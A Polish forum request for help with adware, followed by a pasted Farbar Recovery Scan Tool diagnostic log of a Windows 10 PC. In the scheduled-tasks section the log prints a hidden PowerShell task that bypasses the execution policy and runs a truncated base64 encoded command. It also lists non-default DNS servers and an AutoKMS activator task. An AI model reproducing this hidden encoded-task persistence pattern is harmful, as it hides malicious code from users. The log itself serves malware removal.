Witam! Mój problem czyli reklamy na stronach a czasem i na pulpicie. Praktycznie paraliż. Proszę o wsparcie.
Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x86) Wersja:05-03-2016 01
Uruchomiony przez mbolt (2016-03-07 19:03:30)
Uruchomiony z C:\Users\mbolt\Downloads
Microsoft Windows 10 Home Wersja 1511 (X86) (2016-01-26 03:13:15)
Tryb startu: Normal
==========================================================
==================== Konta użytkowników: =============================
Administrator (S-1-5-21-3242600486-1384832621-3759631297-500 - Administrator - Disabled)
Gość (S-1-5-21-3242600486-1384832621-3759631297-501 - Limited - Disabled)
Konto domyślne (S-1-5-21-3242600486-1384832621-3759631297-503 - Limited - Disabled)
mbolt (S-1-5-21-3242600486-1384832621-3759631297-1001 - Administrator - Enabled) = & gt; C:\Users\mbolt
==================== Centrum zabezpieczeń ========================
(Załączenie wejścia w fixlist spowoduje jego usunięcie.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Internet Security (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Internet Security (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Internet Security (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}
==================== Zainstalowane programy ======================
(W fixlist dozwolone tylko załączanie programów adware z flagą " Hidden " w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.)
32 Bit HP CIO Components Installer (Version: 7.1.8 - Hewlett-Packard) Hidden
7-Zip 15.12 (HKLM\...\7-Zip) (Version: 15.12 - Igor Pavlov)
Adobe Acrobat Reader DC - Polish (HKLM\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 15.010.20059 - Adobe Systems Incorporated)
AVG (HKLM\...\AvgZen) (Version: 1.41.1.56922 - AVG Technologies)
AVG (Version: 16.51.7496 - AVG Technologies) Hidden
AVG 2016 (Version: 16.0.4540 - AVG Technologies) Hidden
AVG Protection (HKLM\...\AVG) (Version: 2016.51.7496 - AVG Technologies)
AVG Zen (Version: 1.41.29 - AVG Technologies) Hidden
BufferChm (Version: 140.0.298.000 - Hewlett-Packard) Hidden
C4500 (Version: 140.0.425.000 - Hewlett-Packard) Hidden
Copy (Version: 140.0.298.000 - Hewlett-Packard) Hidden
Destinations (Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (Version: 140.0.298.000 - Hewlett-Packard) Hidden
DraftSight 2015 SP3 (HKLM\...\{4AA93EC9-9629-4389-832D-CE2252317E70}) (Version: 13.3.1040 - Dassault Systemes)
FMW 1 (Version: 1.62.2 - AVG Technologies) Hidden
Google Chrome (HKLM\...\Google Chrome) (Version: 48.0.2564.116 - Google Inc.)
Google Update Helper (Version: 1.3.29.5 - Google Inc.) Hidden
GPBaseService2 (Version: 140.0.297.000 - Hewlett-Packard) Hidden
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photosmart C4500 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{0EC01D72-4906-42DD-BCC0-AF89EDA7493D}) (Version: 14.0 - HP)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HPPhotoGadget (Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (Version: 140.0.298.000 - Hewlett-Packard) Hidden
HPSSupply (Version: 140.0.297.000 - Hewlett-Packard) Hidden
Intel(R) Processor Graphics (HKLM\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Lenovo EasyCamera (HKLM\...\{ADE16A9D-FBDC-4ecc-B6BD-9C31E51D0332}) (Version: 3.15.0414.1 - Vimicro)
Lenovo System Interface Foundation (HKLM\...\{884BAF97-AC8D-463E-846A-47DD41866A19}) (Version: 1.0.054.00 - Lenovo)
MarketResearch (Version: 140.0.212.000 - Hewlett-Packard) Hidden
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.292.3 - McAfee, Inc.)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x86) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x86)) (Version: 10.0.50903 - Microsoft Corporation)
Narzędzia sprawdzające pakietu Microsoft Office 2013 — polski (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
Network (Version: 140.0.306.000 - Hewlett-Packard) Hidden
Polski pakiet językowy dla narzędzi Microsoft Visual Studio 2010 Tools for Office Runtime (x86) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x86) Language Pack - PLK) (Version: 10.0.50903 - Microsoft Corporation)
PS_AIO_04_C4500_Software_Min (Version: 140.0.425.000 - Hewlett-Packard) Hidden
Revo Uninstaller 1.92 (HKLM\...\Revo Uninstaller) (Version: 1.92 - VS Revo Group)
Scan (Version: 140.0.253.000 - Hewlett-Packard) Hidden
Screenshot Captor 4.16.1 (HKLM\...\ScreenshotCaptor_is1) (Version: - )
Service Pack 1 for Microsoft Office 2013 (KB2850036) 32-Bit Edition (HKLM\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7F6C4883-A18C-459A-82C1-A2F9403F2DA6}) (Version: - Microsoft)
Shop for HP Supplies (HKLM\...\Shop for HP Supplies) (Version: 14.0 - HP)
Skype Click to Call (HKLM\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.18 (HKLM\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.18.112 - Skype Technologies S.A.)
SolutionCenter (Version: 140.0.299.000 - Hewlett-Packard) Hidden
Status (Version: 140.0.342.000 - Hewlett-Packard) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TeamViewer 11 (HKLM\...\TeamViewer) (Version: 11.0.53254 - TeamViewer)
Toolbox (Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (Version: 140.0.297.000 - Hewlett-Packard) Hidden
Update for Skype for Business 2015 (KB3039776) 32-Bit Edition (HKLM\...\{90150000-012B-0415-0000-0000000FF1CE}_Office15.PROPLUS_{905D709F-3A3E-46BB-B1D5-A7AA11430819}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 32-Bit Edition (HKLM\...\{90150000-0011-0000-0000-0000000FF1CE}_Office15.PROPLUS_{7B0DFC04-44CB-436D-9366-01D93383940D}) (Version: - Microsoft)
Update for Skype for Business 2015 (KB3114732) 32-Bit Edition (HKLM\...\{90150000-012B-0415-0000-0000000FF1CE}_Office15.PROPLUS_{7B0DFC04-44CB-436D-9366-01D93383940D}) (Version: - Microsoft)
Visual Studio 2012 x86 Redistributables (HKLM\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WebReg (Version: 140.0.297.017 - Hewlett-Packard) Hidden
==================== Niestandardowe rejestracje CLSID (filtrowane): ==========================
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
CustomCLSID: HKU\S-1-5-21-3242600486-1384832621-3759631297-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 - & gt; C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Zaplanowane zadania (filtrowane) =============
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
Task: {10270579-04A7-41C7-8D1A-2C7ECFDC06F0} - System32\Tasks\GoogleUpdateTaskMachineCore = & gt; C:\Program Files\Google\Update\GoogleUpdate.exe [2016-01-07] (Google Inc.)
Task: {13B28026-5501-42DD-86C0-D4F0699FD40F} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat = & gt; C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {14B5AD33-C009-400D-97D9-C884E30A4C5E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater = & gt; C:\Program Files\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe
Task: {27AB90F1-6EFE-47CA-B33C-51157FA426E6} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn = & gt; C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {385EA182-91EE-46DA-8C21-22E8B2BFE6F5} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack = & gt; C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {53340E01-A95D-4439-A102-0DA33C62EA35} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB = & gt; C:\WINDOWS\system32\MRT.exe [2016-02-10] (Microsoft Corporation)
Task: {56BE778B-ADB8-443C-9496-5808CB4475AE} - System32\Tasks\{9E92810A-3702-4F78-9639-B37371EAB862} = & gt; pcalua.exe -a " C:\Program Files\Reimage\Reimage Repair\uninst.exe "
Task: {67FBF392-5996-4652-A6C4-BA7713B16835} - System32\Tasks\HPCeeScheduleFormbolt = & gt; C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {6C419647-2D00-46BA-80CC-89374334CDE5} - System32\Tasks\Lenovo\ImController\Plugins\LenovoSystemUpdatePlugin_TVSUUpdateTask = & gt; reg.exe add hklm\SOFTWARE\Lenovo\SystemUpdatePlugin\scheduler /v start /t reg_dword /d 1 /f /reg:32
Task: {9AD51705-FCAA-4DC4-A75D-689007169735} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis = & gt; C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe
Task: {9E4A9F92-D648-49D9-9CCF-D724626908B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report = & gt; C:\Program Files\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe
Task: {9E5418B3-0CAB-4A58-9360-C5FCB2546A87} - System32\Tasks\Adobe Acrobat Update Task = & gt; C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-12-13] (Adobe Systems Incorporated)
Task: {B690D807-F0CD-4BA0-BB54-ED27449B0868} - System32\Tasks\GoogleUpdateTaskMachineUA = & gt; C:\Program Files\Google\Update\GoogleUpdate.exe [2016-01-07] (Google Inc.)
Task: {B9A43BB6-D954-46BC-A249-E913774831F4} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher = & gt; C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe
Task: {BF3FC28C-FAE6-45A3-95E4-1B153FD460FB} - System32\Tasks\{D4848225-4739-A4FE-F490-4DCA18088454} = & gt; C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)
Task: {C01C949A-28A3-4F2B-A2C7-397A5839044A} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) = & gt; C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe
Task: {CC2516C8-36C9-4616-A6B1-95DC1997697C} - System32\Tasks\AutoKMS = & gt; C:\Windows\AutoKMS\AutoKMS.exe
Task: {DF48FE3F-8C3F-4644-BFE8-3AC6674077DB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources = & gt; C:\Program Files\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe
Task: {EF025FF6-31DF-4201-AD9B-EAE24AB28C56} - System32\Tasks\{040F0547-790D-797A-0F11-0F0878051178} = & gt; powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (dane wartości zawierają 9452 znaków więcej).
Task: {FED5D713-505A-4826-A12B-89AFCE6EAC40} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start = & gt; C:\Program Files\Hewlett-Packard\HP Support Framework\HPSF.exe
(Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.)
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job = & gt; C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job = & gt; C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleFormbolt.job = & gt; C:\Program Files\Hewlett-Packard\HP Ceement\HPCEE.exe
==================== Skróty =============================
(Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.)
==================== Załadowane moduły (filtrowane) ==============
2015-10-30 06:44 - 2015-10-30 06:44 - 00149504 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-11 09:57 - 2011-03-31 07:47 - 00019456 _____ () C:\WINDOWS\System32\xrhr1alm.dll
2016-02-01 11:31 - 2016-02-01 11:31 - 01232896 _____ () C:\WINDOWS\assembly\NativeImages_v4.0.30319_32\Windows.Networking\2cc274f0a90c57a845556072e2fc317a\Windows.Networking.ni.dll
2016-03-02 11:00 - 2016-02-23 11:34 - 01859960 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-02 11:00 - 2016-02-23 11:34 - 01859960 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-26 03:47 - 2016-01-26 03:47 - 00070656 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-03-02 11:00 - 2016-02-23 08:48 - 00316416 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-28 17:52 - 2016-01-05 02:23 - 05340672 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-28 17:52 - 2016-01-05 02:19 - 00471552 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-28 17:52 - 2016-01-16 06:06 - 02366464 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-28 17:52 - 2016-01-16 06:09 - 02656768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-03-02 16:10 - 2016-03-02 16:10 - 40500224 _____ () C:\Program Files\AVG\UiDll\2171\libcef.dll
2016-01-26 12:32 - 2016-01-26 12:32 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-01-26 12:32 - 2016-01-26 12:32 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-26 12:32 - 2016-01-26 12:32 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2015-10-13 15:07 - 2015-10-13 15:07 - 01032360 _____ () C:\Program Files\Microsoft Office\Office15\ADDINS\UmOutlookAddin.dll
==================== Alternate Data Streams (filtrowane) =========
(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)
==================== Tryb awaryjny (filtrowane) ===================
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość " AlternateShell " zostanie przywrócona.)
==================== EXE - Powiązania (filtrowane) ===============
(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)
==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)
==================== Hosts - zawartość: ===============================
(Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)
2015-07-10 09:28 - 2016-02-18 15:52 - 00000856 ____A C:\WINDOWS\system32\Drivers\etc\hosts
0.0.0.1 mssplus.mcafee.com
==================== Inne obszary ============================
(Obecnie brak automatycznej naprawy dla tej sekcji.)
HKU\S-1-5-21-3242600486-1384832621-3759631297-1001\Control Panel\Desktop\\Wallpaper - & gt; c:\windows\web\wallpaper\theme1\img13.jpg
DNS Servers: 82.163.142.7 - 95.211.158.134
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System = & gt; (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]
==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==
(Obecnie brak automatycznej naprawy dla tej sekcji.)
HKLM\...\StartupApproved\StartupFolder: = & gt; " McAfee Security Scan Plus.lnk "
HKLM\...\StartupApproved\StartupFolder: = & gt; " HP Digital Imaging Monitor.lnk "
HKLM\...\StartupApproved\Run: = & gt; " SynTPEnh "
HKLM\...\StartupApproved\Run: = & gt; " 331BigDog "
HKLM\...\StartupApproved\Run: = & gt; " HP Software Update "
==================== Reguły Zapory systemu Windows (filtrowane) ===============
(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)
FirewallRules: [vm-monitoring-nb-session] = & gt; (Allow) LPort=139
FirewallRules: [{4972E094-F873-4522-BF54-D86F08934384}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqusgh.exe
FirewallRules: [{B7FF748A-38E7-4438-9792-8E3DA7A46CC4}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqusgm.exe
FirewallRules: [{8311BF1B-8080-4EFB-AD01-A649FCB5878E}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
FirewallRules: [{50682836-792C-442E-9DE4-FF8671A6E9DA}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqgplgtupl.exe
FirewallRules: [{7183E80D-1A9B-494A-8A52-72527281187F}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpiscnapp.exe
FirewallRules: [{DBD27C18-AC94-48DA-A417-3663F4AFBCF2}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpoews01.exe
FirewallRules: [{15B092A6-02B1-4561-BEA1-70CEED50869C}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpfccopy.exe
FirewallRules: [{97C644EE-9F68-419F-ABB1-97D67BDCB8CE}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqcopy2.exe
FirewallRules: [{9E46D5FA-F722-49D7-9528-DBFD7C5B76B6}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqkygrp.exe
FirewallRules: [{4D44344E-A977-481E-B715-D644C3F443C4}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hposid01.exe
FirewallRules: [{29B0CF46-1315-4279-B24E-49DDF62149A0}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
FirewallRules: [{89BD8609-5DC4-4B71-BFC5-4AAB3DE0B15C}] = & gt; (Allow) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
FirewallRules: [{DF54CE4B-64C3-42B2-9228-8132C17ED201}] = & gt; (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{A4CD4F29-B6A9-42CE-AF25-73356EE99503}] = & gt; (Allow) C:\Program Files\TeamViewer\TeamViewer.exe
FirewallRules: [{A0C1A695-F8B2-4183-9FA2-FDB4A4B675C5}] = & gt; (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{04B77AFC-7E1A-4426-9CAF-E9FF76DE2246}] = & gt; (Allow) C:\Program Files\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{2ED28D72-CE5A-4587-8C83-3C32E92609F8}] = & gt; (Allow) C:\Program Files\Skype\Phone\Skype.exe
FirewallRules: [{B5635E83-4510-48BE-9816-FF2DF3B88B40}] = & gt; (Allow) C:\Program Files\Multilizer\MultilizerPDFTranslator\PDFTRanslationWizard.exe
FirewallRules: [{13681456-F976-4D14-AA75-714AFBCA2F74}] = & gt; (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
FirewallRules: [{E1F05939-8E30-4971-B1C9-6C68CDBC1B53}] = & gt; (Allow) C:\Program Files\AVG\Av\avgnsx.exe
FirewallRules: [{CE81F6CD-6234-495D-BD2F-F2BDC74C068A}] = & gt; (Allow) C:\Program Files\AVG\Av\avgnsx.exe
FirewallRules: [{A97E5B98-428A-4754-8B45-26B0E49CCB88}] = & gt; (Allow) C:\Program Files\AVG\Av\avgdiagex.exe
FirewallRules: [{59C2CAA5-3EE5-4B79-BAD7-7608C1486D10}] = & gt; (Allow) C:\Program Files\AVG\Av\avgdiagex.exe
FirewallRules: [{746E7515-3D19-46A2-92B9-524DCA7C9F43}] = & gt; (Allow) C:\Program Files\AVG\Av\avgmfapx.exe
FirewallRules: [{35923BC5-BEED-4742-B422-C05ABB189C57}] = & gt; (Allow) C:\Program Files\AVG\Av\avgmfapx.exe
FirewallRules: [{CAA733A4-8E14-4E03-B68D-2692A27A9D47}] = & gt; (Allow) C:\Program Files\AVG\Av\avgemcx.exe
FirewallRules: [{86E35720-87FC-4D43-90A0-F2BA870C6BDD}] = & gt; (Allow) C:\Program Files\AVG\Av\avgemcx.exe
==================== Punkty Przywracania systemu =========================
14-02-2016 18:39:15 Windows Update
18-02-2016 08:13:54 Windows Update
22-02-2016 08:10:42 Windows Update
25-02-2016 10:26:26 Windows Update
28-02-2016 11:42:19 Windows Update
02-03-2016 13:55:24 Windows Update
06-03-2016 19:23:20 Windows Update
==================== Wadliwe urządzenia w Menedżerze urządzeń =============
==================== Błędy w Dzienniku zdarzeń: =========================
Dziennik Aplikacja:
==================
Error: (03/07/2016 06:59:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program iexplore.exe w wersji 11.0.10586.20 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.
Identyfikator procesu: 1fd8
Godzina rozpoczęcia: 01d1789adf1e0ee1
Godzina zakończenia: 37
Ścieżka aplikacji: C:\Program Files\Internet Explorer\iexplore.exe
Identyfikator raportu: 633c7700-e48e-11e5-93de-8056f2e5082e
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:
Error: (03/07/2016 06:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program iexplore.exe w wersji 11.0.10586.20 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w oknie Zabezpieczenia i konserwacja w Panelu sterowania.
Identyfikator procesu: 1298
Godzina rozpoczęcia: 01d1789a81ef32c9
Godzina zakończenia: 39
Ścieżka aplikacji: C:\Program Files\Internet Explorer\iexplore.exe
Identyfikator raportu: 1bafddc9-e48e-11e5-93de-8056f2e5082e
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:
Error: (03/07/2016 06:26:03 PM) (Source: MsiInstaller) (EventID: 11706) (User: TSB-MB)
Description: Product: HP Support Assistant -- Error 1706.No valid source could be found for product HP Support Assistant. The Windows Installer cannot continue.
Error: (03/07/2016 06:25:46 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: Lenovo.Modern.ImController.PluginHost.exe, wersja: 1.0.72.0, sygnatura czasowa: 0x56aaf746
Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.10586.103, sygnatura czasowa: 0x56a84ca9
Kod wyjątku: 0xe0434352
Przesunięcie błędu: 0x000d2f22
Identyfikator procesu powodującego błąd: 0x17ec
Godzina uruchomienia aplikacji powodującej błąd: 0xLenovo.Modern.ImController.PluginHost.exe0
Ścieżka aplikacji powodującej błąd: Lenovo.Modern.ImController.PluginHost.exe1
Ścieżka modułu powodującego błąd: Lenovo.Modern.ImController.PluginHost.exe2
Identyfikator raportu: Lenovo.Modern.ImController.PluginHost.exe3
Pełna nazwa pakietu powodującego błąd: Lenovo.Modern.ImController.PluginHost.exe4
Identyfikator aplikacji względem pakietu powodującego błąd: Lenovo.Modern.ImController.PluginHost.exe5
Error: (03/07/2016 06:25:42 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikacja: Lenovo.Modern.ImController.PluginHost.exe
Wersja architektury: v4.0.30319
Opis: proces został przerwany z powodu nieobsłużonego wyjątku.
Informacje o wyjątku: System.BadImageFormatException
w LenovoAudioPlugin.AudioAccess.RunCustomMonitor(IntPtr, IntPtr, System.String, Int32)
w LenovoAudioPlugin.AudioAccess+ & lt; & gt; c. & lt; RespondToEventAsync & gt; b__13_0()
w System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
w System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
w System.Threading.ThreadHelper.ThreadStart()
Error: (03/07/2016 06:22:44 PM) (Source: HP Active Health) (EventID: 2500) (User: )
Description: Agent ApplicationsInstalled threw an exception: System.Management.ManagementException: Generic failure
w System.Management.ManagementException.ThrowWithExtendedInfo(ManagementStatus errorCode)
w System.Management.ManagementObjectCollection.ManagementObjectEnumerator.MoveNext()
w HP.ActiveHealth.Commons.Objects.AgentDataQuery.ManagementProperties.MoveNext()
w HP.ActiveHealth.Agents.ApplicationsInstalled.ApplicationsInstalledAgent.GetNewDataClasses(FileInfo agentStateFile)
w HP.ActiveHealth.Agents.ApplicationsInstalled.ApplicationsInstalledAgent.CollectNewDataClasses(FileInfo agentStateFile, IDataClassCollector dataClassColector)
w HP.ActiveHealth.API.DataGeneration.AgentRunner.QueryAgentDelegate(Object agentObj)
Error: (03/07/2016 06:22:00 PM) (Source: MsiInstaller) (EventID: 11723) (User: TSB-MB)
Description: Produkt: HP Support Solutions Framework - Błąd 1723. Wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić biblioteki DLL wymaganej do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. Akcja: CheckHPSAInstall, wpis: CheckIfLatestHPSAInstalled, biblioteka: C:\WINDOWS\Installer\MSID6B4.tmp
Error: (03/07/2016 06:13:41 PM) (Source: MsiInstaller) (EventID: 11706) (User: TSB-MB)
Description: Product: HP Support Assistant -- Error 1706.No valid source could be found for product HP Support Assistant. The Windows Installer cannot continue.
Error: (03/07/2016 06:09:10 PM) (Source: MsiInstaller) (EventID: 11723) (User: TSB-MB)
Description: Produkt: HP Support Solutions Framework - Błąd 1723. Wystąpił problem z tym pakietem Instalatora Windows. Nie można uruchomić biblioteki DLL wymaganej do dokończenia tej instalacji. Skontaktuj się z personelem pomocy technicznej lub dostawcą pakietu. Akcja: CheckHPSAInstall, wpis: CheckIfLatestHPSAInstalled, biblioteka: C:\WINDOWS\Installer\MSI2049.tmp
Error: (03/07/2016 06:08:33 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 48.0.2564.116, sygnatura czasowa: 0x56c52f1d
Nazwa modułu powodującego błąd: unknown, wersja: 0.0.0.0, sygnatura czasowa: 0x00000000
Kod wyjątku: 0xc0000005
Przesunięcie błędu: 0x004bab1f
Identyfikator procesu powodującego błąd: 0x1404
Godzina uruchomienia aplikacji powodującej błąd: 0xchrome.exe0
Ścieżka aplikacji powodującej błąd: chrome.exe1
Ścieżka modułu powodującego błąd: chrome.exe2
Identyfikator raportu: chrome.exe3
Pełna nazwa pakietu powodującego błąd: chrome.exe4
Identyfikator aplikacji względem pakietu powodującego błąd: chrome.exe5
Dziennik System:
=============
Error: (03/07/2016 06:33:33 PM) (Source: Microsoft-Windows-WindowsUpdateClient) (EventID: 20) (User: ZARZĄDZANIE NT)
